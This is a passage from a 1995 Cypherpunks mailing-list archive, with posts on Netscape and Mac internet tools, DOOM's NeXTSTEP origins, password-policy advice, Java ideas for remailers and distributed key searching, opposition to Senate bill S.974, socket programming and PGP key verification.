preinstalled. But we both know that MS Work is often not the best tool for
the job. It spreadsheet pales compared to Excel, its wordprocessor lacks
features, etc. Consequently, many people that buy a computer packaged with
Works end up replacing or augmenting Works with other, specialized,
programs that do a better job at many of the tasks that Works claims to
do.

Netscape is, in many regards, just like Works. It has a sub-standard
newsreader, a featureless mailer -- but a very nice browser. So many
people use Netscape for a browser and other programs for other tasks,
because other programs are better suited for it than Netscape.

When Robert mentioned that he was wondering how you would think about
Netscape in six months, he was perhaps thinking what most experienced Mac
using netsurfers know:

The various leading Mac Internet programs are excellent modular tools
that, thanks to cooperation between the various authors, are tighly
integrated. Often, the same key combinations that work in one progamm,
work in the other. They are small, they are fast, and they can call each
other. The only odd man out is Netscape, which tries to do it all by
itself and therefore does nothing right.

Once someone tries Anarchie for ftp, or one of the enhanced (current
leader seems to be Y.A.) Newswatchers for USENET, there is no going back
to just Netscape. 

I remeber writing here once that after someone tries surfing the Web with
Mosaic, there is no going back to just using lynx. The same holds true for
Anarchie, Newswatcher, Eudora -- and Netscape.

Let's talk in six months (no barb, just confidence that you will learn new
things as time goes by),

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA/x6SoZzwIn1bdtAQGXNgGAm2v5m3S8rJ4UWOpWSR+JD6KU1zscjsEm
xU89gO9nuJzUXk5JbOM0EhAWc9bi/kER
=Nwn1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Fri, 21 Jul 95 12:54:02 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: The OS wars and DOOM...
In-Reply-To: <199507211218.AA20295@tyrell.net>
Message-ID: <Pine.SUN.3.91.950721140842.196B-100000-100000@bambam>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Phil Fraering wrote:

> 
> This is a point I want to bring up regarding the current
> OS war being waged on this group.
> 
> Apps have migrated from Unix to the Mac and the PC before in
> the past. In the further past, this has included curses and
> other-types-of-text-control packages such as PC versions of
> Emacs and nethack and the like.
> 
> Of course, this was not done with graphical programs; everyone knows
> that graphics isn't Unix's strong suit, and what it has is so different
> from the PC, etc., blah, blah,...
> 
> Except that for the past two or three years, it's been WRONG.
> 
> One of the hottest games on the PC, DOOM, was originally written in
> Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" of
> Unix) and then ported to the PC.

Very good example ... I think you will find that many programs are 
physcially coded on a unix box and crossed compiled using something
like gcc or g++. One of the last steps is add the gui interface if 
required, compile on the native target platform using the compiler of
choice for that target. 

I have a friend who is coding an OS/2 project and using AIX as the 
development platform. The project started by downloading some source
code for a unix platform that essentially performed the desired task
studying it and modeling their code  after the source code off the net.
Why reinvent the wheel ?

> I don't know which Unix environment they're using in the "master"
> development effort before porting to other environments today.
> 
> Given that games usually program close to the hardware, and are 
> therefore the _most_ difficult things to port from one environment
> to another, it really makes one wonder why Excel isn't out for
> (for example) Linux or BSD today.

Very true of games and that is one of the reasons DOS is a popular
platform for games ... direct hardware control is possible and the
hardware architecture is only INTEL x86 ... although the technology 
is evolving beyond this point rapidly. Another reason for the large 
game market with DOS machines is simply the huge home market where 
DOS is the undisputed leader. 


-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 21 Jul 95 13:02:32 PDT
To: gorkab@sanchez.com
Subject: Re: big word listing
In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com>
Message-ID: <doug-9506212002.AA001121984@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>As a security measure, I am trying to get a massive dictionary of words
>together, and each time a user changes his/her password, it checks the list to
>see if the password is in it.  My question is, are there any pre-built lists of
>this nature?  I am currently only using a spelling dictoinary, and would like
>somthing a little bigger.
>
>
>
You're re-inventing the wheel. look for npasswd or passwd+. Both do things
like that. Or, better yet, don't use dictionaries at all (they're out of date
as soon as they're made available). Use rules that force your users to
choose good passwords (just don't be too Draconian. ;).  We have a rule
that says a user must choose at least one upper case character, one lower
case character, and one number, symbol, or control character in his/her
password. It's met little resistance, a few complaints, and it's immune
to most dictionary password schemes. The only other restriction is that
they must have at least 6 characters in their passwords. That was already
"mostly" enforced, so there was no problem there. 
 This prevents people from picking passwords like the name of a significant
other, the name of a place, or some foreign language word that normal
dictionaries wouldn't necessarily catch, but some password cracking program
"might" (depending on who has the more recent dictionary).

 This really is more along the charter of comp.unix.security though, and
not cypherpunks (IMHO).

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 21 Jul 95 12:06:48 PDT
To: cypherpunks@toad.com
Subject: New Form of DOS Attack
Message-ID: <199507211902.PAA28170@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apropos of nothing...

Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry."

If you want to deny the Feds the opportunity for some energetic service of process, all you have to do is hire Rodney King to move in.  Once he is onsite, the Feds will be helpless.  Just keep your Greenpeace Special (tm) sat cams focussed on old Rodney and you have absolute immunity from all incursion.

Too bad we can't clone him.

DCF

"Goodby cruel world, I'm off to join the circus.  Hey, Mr. Barnum save a place for me."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 21 Jul 95 15:24:34 PDT
To: cypherpunks@toad.com
Subject: science foundation interested in anonymity
Message-ID: <199507212210.PAA15177@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A mindblowing opportunity to promote the cypherpunk
ideal of anonymity in a highly reputable and influential
context recently dropped into the lap of a friend of
mine.

This close friend of mine got an inquiry from an extremely
prestigious science foundation into the possibility
of studying anonymity in cyberspace. It is an entirely
embryonic stage right now, but a director at this 
association is interested in commissioning papers,
interviewing subjects, having focus groups, perhaps even
organizing a conference on the subject, particularly the 
"social, legal, and technical" angles. This may have major
impact in the various and sundry studies influencing
future policy on the "information highway".

If you can forward me some leads, I would appreciate it
greatly, and I will get you in touch with this key person.

At this point the contact is at an idea stage and probably
would benefit greatly from talking to organizers of similar endeavors.
Also this project would involve fundraising for the cost
of the studies, so anyone you might know with an interest
in sponsoring this kind of endeavor (particular corporations,
although that would be a bit paradoxical I admit), please 
send me email.

For example, if someone could get me the name/phone/email address
of whoever chaired that panel on Anonymity a few years ago 
at the Conference on Freedom and Privacy (Helsingius and
Gilmore were panelists), I would greatly appreciate it.

many thanks--


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 21 Jul 95 12:17:35 PDT
To: cypherpunks@toad.com
Subject: New Form of DOS Attack
Message-ID: <199507211917.PAA01722@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apropos of nothing...

Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 21 Jul 95 15:21:22 PDT
To: frissell@panix.com
Subject: Re:  New Form of DOS Attack
Message-ID: <9507212224.AA05214@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>If you want to deny the Feds the opportunity for some energetic service of proc>ess
>all you have to do is hire Rodney King to move in.  Once he is onsite, the Feds
>will be helpless.  Just keep your Greenpeace Special (tm) sat cams focussed 
>on old Rodney and you have absolute immunity from all incursion.

Err, hasn't he just been indicted again?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 21 Jul 95 12:27:44 PDT
To: cypherpunks@toad.com
Subject: Re: Cyberporn on NPR today
In-Reply-To: <3uopsm$cts@life.ai.mit.edu>
Message-ID: <9507211927.AA00508@toast>
MIME-Version: 1.0
Content-Type: text/plain


>But I expect it to focus on the technology questions, not the shrill
>"Save our children from the plague..." hysteria.

Only two callers through, first one should have hung up when he heard
all of his arguments made (better) in the first half hour.  Second
caller asked whether the Pynchon mailing list he's on would have to
censor itself if the Exon ammendment passed (seemed a decent point -
succinct too).

The rest of the time was the same old political debate with a few
moments about Surfwatch.  Equal time given to the opposition, who
spoke about the horrors of unspeakable besiality, rape, etc.

-- 

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 21 Jul 95 13:37:47 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Java (was Netscape: the big win)
Message-ID: <9507212034.AA00995@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  So, what would be a "cypherpunk" thing you could do with Java?  I
>  know I can use it to download little applets to my system to do
>  animations.  What can it do to enhance my privacy?  What would be
>  the Java equivalent of PGP?

How about the old-standbys:  remailers.  Mixmaster is definitely where the  
technology is at, but it requires a client to use...  Of course, with Java,  
there is the potential that _any_ user from any platform could connect to the  
Mixmaster Web page, get the client software, and start using the remailer  
network.  Without having to compile, know anything, etc...

If a Mixmaster client were available in Java (and I'm pretty sure it can be  
done) then suddenly everyone who previously could only use the penet server  
can now also use Mixmaster.  With more people using the remailer network, all  
of them with Java clients, the possibility of for-pay remailers could become  
reality (no promises that you'll get rich though).

There are many crypto-anarchy applications as well:

Key cracking.  If you can write a key-cracker and keyspace fetcher in Java,  
then people can join key cracking efforts as easily looking up an URL.  It  
may not be nearly as efficient as the highly optimized C versions used in the  
current RC4-40 efforts, but there's going to be millions of potential workers  
this way.  If you were charging money to break keys (or you were looking for  
keys that are very valuable to you), you could set up the worker client to  
accept e-cash for in return for searching keyspace "Click here to earn money  
while you aren't using your machine..."   Ensuring that workers are actually  
searching the keyspace and other implementation details is left as an  
exercise for the reader.

e-instrument or information exchanges, with Java interfaces for bidding,  
buying, selling, etc...

DataHavens, which would probably require complex (internally) software to use.

I'm sure the online casino people are salivating over the prospects too...

Basically any fancy crypto application that requires a custom client to  
operate...  Since its platform independent, efforts will be put to better use  
as well.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 21 Jul 95 12:41:49 PDT
To: cypherpunks@toad.com
Subject: New Form of DOS Attack
Message-ID: <199507211941.PAA06535@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apropos of nothing...

Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry."

If you want to deny the Feds the opportunity for some energetic service of process, all you have to do is hire Rodney King to move in.  Once he is onsite, the Feds will be helpless.  Just keep your Greenpeace Special (tm) sat cams focussed on old Rodney and you have absolute immunity from all incursion.

Too bad we can't clone him.

DCF

"Goodby cruel world, I'm off to join the circus.  Hey, Mr. Barnum save a place for me."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 21 Jul 95 12:48:27 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Something occured to me
In-Reply-To: <Pine.ULT.3.91.950721113352.5103A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.950721154315.14473A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Robert A. Hayden wrote:

> Whent he republicans took over the congress, they instidtued that 
> Contract on America.   One of the first laws that was passed (by both 
> parties, I might add) was a law that made lawmakers abide by the same 
> laws that "normal" people abide by.

If you believe that...

Well, it is true, under certain limited circumstances, but it doesn't 
make them criminally liable for writing bad laws, nor can it.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 21 Jul 95 12:51:50 PDT
To: ben@reston.opnsys.com
Subject: Re: Louie Freeh
In-Reply-To: <Pine.A32.3.91.950721125034.18393A-100000@reston.opnsys.com>
Message-ID: <Pine.SUN.3.91.950721154444.14473B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995 ben@reston.opnsys.com wrote:

>     I was just listening to the G. Gordon Liddy Show, he was talking to a 
> reporter for the American Spectator, which has a piece on our favorite 
> FBI director Freeh. From the sound of the reporter the story is very 
> damming, on everything from Waco to the entrappment of Malcolm X's 
> daughter.

Having experience using American Spectator as a source for research 
papers, I can state without any doubt in my mind that anything I read in 
AS I attempt to find proof of their claims somewhere else.

Not to say that Freeh is good, or that the claims aren't true this time 
(I haven't read it, yet..), but their articles in the past have had 
glaring lies^H^H^H^H inaccuracies.  It's like reading the traditional 
liberal media... they'll twist anything to fit their preconceptions.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Fri, 21 Jul 95 14:48:59 PDT
To: Andre Turgeon <andre@oscar.cs.byu.edu>
Subject: Re: Problem synchronizing sockets...
Message-ID: <v01520d00ac35d2195066@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>        I'm a newbie at socket programming so this is probably going to
>be an easy question (I hope). I've been developing a client/server
>project using SSLeay and I'm having problem synchronizing my messages.
>More specifically, I use a combination of SSL_read and SSL_write to
>exchange messages bix my client and server. The problem is that my
>client is reading (SSL_read) before the server is done writing and reads
>an empty buffer. This does not occur all the time but often enough to
>make things quite unreliable... I've tryed using the select() command
>but that doesn't solve it. Help.....
>
>        Andre

This is generally true of sockets programming.  You don't know that you'll get
as many bytes as you request.  The simplest solution is to loop your read
calls until you get what you need.  See BSD Sockets: A Quick & Dirty Primer
for a sample solution.  The URL is http://www.ntua.gr/unix/sockets.html

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 21 Jul 95 15:05:27 PDT
To: cypherpunks@toad.com
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org>
Message-ID: <7pBEwkkAs2IH084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 21 Jul 95 8:46:26 -0600,
Paul Elliott <paul.elliott@hrnowl.lonestar.org> wrote:

> Many of the leaders of the major net civil liberties organizations have made
> statements concerning SB 974. They seem to agree that no action alert
> or coalition on SB 974 should be formed at this time.  [...]

> I remain concerned about this bill and am not satisfied with the response
> to this bill.

Your points are well taken, but I'm still in favor of concentrating
on the Exon bill until such time as SB 974 shows any signs of support
from other politicians.  Both bills are preposterous, of course:
unconstitutional and unenforceable.  There's one particularly absurd
aspect to SB 974 that I haven't seen mentioned on the Cypherpunks
list, possibly because it goes without saying.  I'll say it anyway,
first quoting the relevant portion of the bill:

`Sec. 1030A. Racketeering-related crimes involving computers
 `(a) It shall be unlawful    [...(1) snipped -- ADW]
 `(2) to distribute computer software that encodes or encrypts
      electronic or digital communications to computer networks that
      the person distributing the software knows or reasonably should
      know, is accessible to foreign nationals [...]

One area where the U.S. has retained strong international competitiveness
is its colleges and universities.  The number of these institutions that
have no foreign nationals enrolled is *damn* small, and largely comprises
"Ace's Truck Driving College" and the like.  Foreign nationals who are in
this country to attend college are exempt from the usual I-9 employment
restrictions; hence, many are also employed at full-time summer jobs,
internships (in government or the private sector), teaching assistantships,
or work-study positions, which may involve access to computer networks.
(Many foreign nationals complete medical residencies in U.S. hospitals,
for example.)

Preventing these people from having access to crypto software is simply
impossible.  This bill would make criminals out of thousands of network
administrators and MIS types, simply for having crypt() or Norton Diskreet
around.  If the bill gains any momentum whatsoever, I expect howls of
protest from the academic world.  I'm not sure a megabuck lobbying effort
by private industry will be necessary:  letters from Computing Services
honchos at some prestigious schools/hospitals/corporations should induce
even the most technically clueless congressdroids to pull their heads out
of their asses on this issue...(OK, maybe not Jamf-^H^Hes Exon, but enough
of 'em to prevent the bill's passage.)

Anyway, I'm glad nobody's suggested a Cypherpunk SB 974 infomercial,
financed "by each according to his ability to pay," as happened during
the Clipper debate...maybe the list *is* evolving...:-)

OK, back to your regularly scheduled Trans- and Cross-Continental Realtime
Virtual Kneecapping & Interface Flamefest, a perennial Cypherpunk favorite!


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBAh3FRRFMq4NZY5AQGDswP+KwtgTTnZszFOsHAUIqM/UEftkBLmnKJs
kyFnhnqyYk+Oe2CS7pqjrV36O3XqvnFvJx6RzPdCgcR1J97ytjP7izACLoYHSjVR
Fzsedf5SxynppZqAlTMz1dWozyO28F0RcTvmPG+Aid0EtXOgdii90MCH93Z7XC4o
iViIX46al84=
=519b
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Gorsuch <chrisg@chrisg.itg.ti.com>
Date: Fri, 21 Jul 95 14:20:19 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507212117.QAA00160@chrisg.itg.ti.com>
MIME-Version: 1.0
Content-Type: text/plain



   The crack library points to some dictionaries which have not only real and
"imagined" (literary) words, but also words from other languages as well.
All in all a good resource.  -see adams message for pointers

   However, the reason I write is if you decide to add users previously used
passwords to the dictionary, make sure your "appendages" to the dictionary
are secured.  Users are notorious for forgetting to change or reusing on 
other machines the passwords from various servers.  The advantage is that
your users will never be able to reuse their old passwords.  The disadvantage
is that your admins can attempt to hack other machines using these passwords.

   A "cryptographic" solution would be to simply store a hash of the password
rather than the password itself in the "appended" dictionary.  A CRYPTOGRAPHIC
solution would be to use one time passwords :).

Chris Gorsuch
chrisg@ti.com 
*I am not responsible for the content of the above message :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Fri, 21 Jul 95 10:55:36 PDT
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: Cyberporn on NPR today
In-Reply-To: <9507211504.AA22710@grape-nuts>
Message-ID: <m0sZOiZ-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


> Talk of the Nation on NPR is having a call-in program this afternoon
> on the "pervasiveness of cyberporn".  I think it's 1:00 or 2:00.
> Crypto-relevance... 4 horsepeople... 

That will be Talk of the Nation -- Science Friday.

You can do lots worse than Ira Flato, the host. 

But I expect it to focus on the technology questions, not the shrill
"Save our children from the plague..." hysteria.

- -- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMBAObxqU5+N/mI7JAQHpEQP+KNyxSKOylBZKtLeCzhFYTWjpKE1lu25b
tGbBxwII5O4Ba5/g1pCYCWYkwFI5ZvXJg4xEu6XdKE8lz3HwSSl6lMXGDLtqTmYF
IrwOjcrnkD36EliwXsX7V1chNjfOSFyE9IDWG5RV9S1qBTSbTMVbUHA3w+A2ejgL
YKaJv97iB/A=
=a8iN
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Fri, 21 Jul 95 13:40:02 PDT
To: cypherpunks@toad.com
Subject: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help me with my PGP
Message-ID: <i8VL9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:

>   And I say "No no no, using a key which you got through the Net is better 
> than using no key at all, just be aware that if someone *really* wanted
> to spy on you that they could have tampered with it.  When you see Cousin
> Joe next Christmas you can compare keys with him and make sure you have the
> right one."

I suppose one could always send Cousin Joe an encrypted message and see if he
can read it.....


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMBAPON74r4kaz3mVAQGoXQP9HYxFLJ3BEs5YhJ3Yaf3NGbUTIwB3pBw+
QNAzqiuKcNQmQ8/EZ160FK8JeeKAwMcSHA/a+/coG5+82DEiDfbkyLRXJK60c+j3
jVksrm3jxd9nfBk1SrWddHj6SYg8+0Rxz9aNFkfmwcNWJVPNcDkwvzAHZ1wO9rqZ
gPaq8xIjfAA=
=1I7d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Fri, 21 Jul 95 13:50:03 PDT
To: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Subject: Re: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help
In-Reply-To: <i8VL9c1w165w@voxbox.norden1.com>
Message-ID: <qLwL9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT) writes:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:
> 
> >   And I say "No no no, using a key which you got through the Net is better 
> > than using no key at all, just be aware that if someone *really* wanted
> > to spy on you that they could have tampered with it.  When you see Cousin
> > Joe next Christmas you can compare keys with him and make sure you have the
> > right one."
> 
> I suppose one could always send Cousin Joe an encrypted message and see if he
> can read it.....

PS -- To make sure you hear back from him, tell him in the message that you
won $50,000,000 in the Italian lottery (which doesn't notify the IRS). If you
also hear back from the IRS,  let us know -- FAST.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMBASNt74r4kaz3mVAQFz9wP+Ks1WkIJcBBUAX5QpJbJZDc+ECElDIh2a
sZ0gbcUrGwUDcCUdXtcmYnmewlbz6BC1E3BNi6Mrav3Dqy5tDretl6ZcU3xvoCg7
MQplUgildLu4/BvFLDPzaJa73ngQvIRpXfq0/YZ2lNOMVjUiTc5VER6OSYPiZI4S
cOFEdEkQXLk=
=LW4l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Fri, 21 Jul 95 13:58:51 PDT
To: paul.elliott@Hrnowl.LoneStar.ORG (Paul Elliott)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org>
Message-ID: <199507212057.QAA15341@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


We've not "bowed out" on this bill, it's just not significant enough a 
threat (yet) to warrant stirring up a lot of activism about it - which 
would detract from the focus on the CDA and it's clones.

We'll be tracking this bill and will certain help form a campaign against 
it if it looks to be going anywhere. In the mean time, we're issuing an 
analysis of it, and will keep the net informed.

--
<A HREF="http://www.eff.org/~mech/">          Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>   Online Services Mgr.      



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ruf@osiris.cs.uow.edu.au (Justin J. Lister)
Date: Sat, 22 Jul 95 00:42:42 PDT
To: ids@uow.edu.au (Intrusion Detection System Mailing List)
Subject: Searching for reference
Message-ID: <m0sZMBI-0005qDC@osiris>
MIME-Version: 1.0
Content-Type: text


I am trying to find some pointers to a recent UK finacial services report
of the Foresight Program. It deals with fraud detection systems, an 
outline appeared in 'The Australian' 9th May 1995 - by Vanessa Houlder from
Financial Times, London.

Additionally any pointers to :-

	Jason Kingdon of SearchSpace.

	Barclay and Touche Ross (Mr Mark Tantum) - Fraud 2000 system.

	Visa International's 
		- Cardholder Risk Identification System (CRIS)
		- Merchant Risk Identification System (MRIS)

	Cooper & Lybrand's (System Name?) - Using Netmap visualisation 
	software (by Active Analysis) in conjunction with neural net & 
	knowledge based system.

Additionally any information in regard to such systems would be useful.
TRW, Mastercard, etc..

So far have been unable to find any details via gopher, netfind searches
and would like to avoid making international phone calls.
-- 
+---------------------+--------------------------------------------------+
|  ____       ___     | Justin Lister                 ruf@cs.uow.edu.au  |
| |    \\   /\ __\    |     Center for Computer Security Research        |
| | |) / \_/ / |_     | Dept. Computer Science      voice: 61-42-214-327 |
| |  _ \\   /| _/     | University of Wollongong      fax: 61-42-214-329 |
| |_/ \/ \_/ |_| (tm) |     Computer Security a utopian dream...         |
|                     |       Disclaimer: dreaming is at own risk        |
+---------------------+--------------------------------------------------+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 21 Jul 95 15:05:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org>
Message-ID: <9507212204.AA16780@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Paul Elliott writes:
> The best time to persuade these "experts"
> will be before they make any public statements about the bill in the
> subcommittee hearings and their positions are locked by pride not 
> wanting to publicly change their positions. Thus we should be contacting
> these people now, and we may have a chance to nip SB 974 in the bud.

Sen. Kyl (Arizona) became a co-sponsor of S.974 yesterday (7/20/95). He,
at least, appears to believe the bill is still heading somewhere.

(Ref: Congressional Record, pg. S10427)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 21 Jul 95 16:18:35 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: The OS wars and DOOM...
Message-ID: <9507212317.AA01248@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Apps have migrated from Unix to the Mac and the PC before in the
>  past. In the further past, this has included curses and
>  other-types-of-text-control packages such as PC versions of Emacs
>  and nethack and the like.

>  Of course, this was not done with graphical programs; everyone
>  knows that graphics isn't Unix's strong suit, and what it has is
>  so different from the PC, etc., blah, blah,...

>  Except that for the past two or three years, it's been WRONG.
>  One of the hottest games on the PC, DOOM, was originally written
>  in Nextstep (a Unix variant, and a ghetto even amidst the "ghetto"
>  of Unix) and then ported to the PC.

Being a resident of the NeXTSTEP ghetto, please allow me to chime in.  While  
Doom is written on NeXTSTEP boxes, that's about all the game itself has in  
common with it.  The game is carefully written in strict ANSI-C and any  
portions that must be OS specific are separate.  They have a VGA emulator  
that allows them to run Doom on non-DOS boxes.  All of the platform  
independance comes from the discipline of the developers (who are extremely  
talented, IMHO).  In contrast, Lotus Improv was NeXT native and had to be  
completely rewritten over a period of at least 3 years to get it to work on  
Windoze.

The primary reason Id software (and Trilobyte among others) uses NeXTSTEP  
(over DOS or any other unix environment) is because it lets them write  
in-house tools like map and monster editors really fast (and really slick  
too!).  On any other platform it would take much more time and effort to  
write the tools and they probably wouldn't be as nice either.  Since these  
tools aren't being sold to customers, it doesn't matter that they only run on  
a dead-end niche software platform that costs $1000 per user (and $5k per  
developer!!).

This strategy makes sense for a commercial video game where there is the  
opportunity to save major amounts of time and effort through the use of  
custom tools (and the incentive of major amounts of cash if it is  
successful).  However, this strategy definitely doesn't make sense when you  
are talking about a cypherpunk donating their spare time to write a freeware  
